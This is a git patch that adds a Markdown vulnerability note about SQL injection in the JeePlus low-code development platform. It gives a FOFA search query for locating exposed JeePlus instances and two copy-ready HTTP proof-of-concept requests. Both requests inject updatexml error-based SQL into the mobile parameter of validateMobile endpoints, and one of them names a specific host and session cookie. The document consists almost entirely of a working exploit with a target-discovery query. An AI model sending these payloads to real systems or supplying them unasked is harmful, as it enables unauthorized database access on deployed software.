From ea2a85dc4ddff407c892939029afdba03414c2ca Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 7 Apr 2024 20:18:03 +0800 Subject: [PATCH] =?UTF-8?q?Create=20JeePlus=E4=BD=8E=E4=BB=A3=E7=A0=81?= =?UTF-8?q?=E5=BC=80=E5=8F=91=E5=B9=B3=E5=8F=B0=E5=AD=98=E5=9C=A8SQL?= =?UTF-8?q?=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JeePlus低代码开发平台存在SQL注入漏洞.md | 26 +++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 JeePlus低代码开发平台存在SQL注入漏洞.md diff --git a/JeePlus低代码开发平台存在SQL注入漏洞.md b/JeePlus低代码开发平台存在SQL注入漏洞.md new file mode 100644 index 0000000..11c03de --- /dev/null +++ b/JeePlus低代码开发平台存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +## JeePlus低代码开发平台存在SQL注入漏洞 + +## fofa +``` +app="JeePlus" +``` + +## poc +``` +GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +``` + + +## poc2 +``` +GET /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1 +Host: 0.03.614.230:8282 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +Cookie: jeeplus.session.id=a24d6e112a864ef795cce1f664a6022a; +```